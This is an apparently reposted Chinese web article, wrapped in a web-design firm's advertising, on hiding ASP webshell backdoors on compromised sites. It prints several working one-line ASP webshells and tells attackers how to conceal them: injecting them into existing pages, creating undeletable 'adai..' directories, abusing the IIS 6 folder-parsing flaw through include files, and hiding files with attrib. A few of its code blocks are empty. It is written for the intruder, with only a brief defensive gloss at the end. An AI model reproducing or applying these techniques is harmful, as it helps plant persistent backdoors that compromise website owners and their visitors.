后门木马隐藏技术分析

后门木马隐藏技术—webshell的隐藏

成都创新互联专注于网站建设|企业网站维护|优化|托管以及网络推广,积累了大量的网站设计与制作经验,为许多企业提供了网站定制设计服务,案例作品覆盖发电机回收等行业。能根据企业所处的行业与销售的产品,结合品牌形象的塑造,量身开发品质网站。

比较笨的方法就是找一些比较深或者比较隐蔽的地方放自己的ASP木马,这个就不用我说了吧。

下面这些方法,只要大家利用好,做个隐藏的ASP后门是不成问题的。

1.插马法

其实,我们可以直接把一句话插入已经存在的页面了,但是,问题出来了,像常用的

 
 
 
  1. <%execute(request("a"))%>   
  2. <%execute(request("value"))%>   
  3. <%eval request("#")%>   
  4. <%if request("cnxhacker")<>"" then Session("b")=request("cnxhacker")  
  5. if Session("b")<>"" then execute Session("b")%>  

等等,这些一句话一插进去的话,就会报错,一下就会被发现...其实,我们忽略了一个天天在用的S端

 
 
 
  1. eval(Request.form('#')+'') 

冰狐的一句话客户端,这个调用的是Javascript脚本,跟调用Vbscript不同,Javascript是运行在客户端的,也就上一HTML端,所以我们可以直接把他插入在页面中,而不报错。这样,就达到了隐藏后门的技术。(建议大家找个比较大的页面,随便插在,,这些标签后门都可以的)

2.建立非标准目录

这个只要有CMDshell 就可以了,当然提权***。直接在站点跟目录下建立个文件夹,DOS法:md adai.. 然后在拷贝自己的木马到这个目录下,比如木马在d:\web\wind.asp 就把他拷贝到d:\web\adai..\wind.asp 这样,也可以起到隐藏作用。

3.include调用法

知道最近出了个动易的ODAY么,就是利用03服务器的IIS解析的漏洞,我给大家讲解下,03服务器会对asp的文件进行解析,这样就可以达到我们隐藏后门的技术了,大家会经常看到

 
 
 
  1.  

之类的代码吧,OK,咱们就利用这个方法来隐藏。

先建立个普通的asp文件夹(记着,是文件夹),例如adai.asp,然后再在adai.asp里面建立个图片文件如adai.jpg。在里面插入一句话代码。然后在建立个文本文件如wind.txt,接着在wind.txt里插入:。这样咱们在访问站点的wind.txt时,就是我们的一句话后门了,有些菜鸟可能会问

 
 
 
  1.   

是ASP的内容,怎么能在JPG里生效呢?我刚才不是说了么,03服务器的IIS会解析asp文件么。所以我们在访问adai.jpg时,他就误认为在访问wind.asp了。这种方法在隐藏方面也是很不错的,大家可以把adai.jpg放在别的目录里,记得更改下include file里的路径就可以了。
如果怕被管理员发现adai.asp时,咱们可以把他隐藏起来啊 DOS下输入:

 
 
 
  1. attrib +H +S adai.asp 

木马的防止一直是令人头疼的事,希望大家通过以上的介绍能够了解了后门木马的隐藏技术,已达到知己知彼百战百胜,

【编辑推荐】

  1. 木马释放器集合恶意程序
  2. 木马强化恶意文件迷惑性
  3. 给你预防病毒的八个忠告
  4. 解析专攻Mac的木马 图解

网站栏目:后门木马隐藏技术分析
URL标题:http://www.shufengxianlan.com/qtweb/news10/18910.html

网站建设、网络推广公司-创新互联,是专注品牌与效果的网站制作,网络营销seo公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联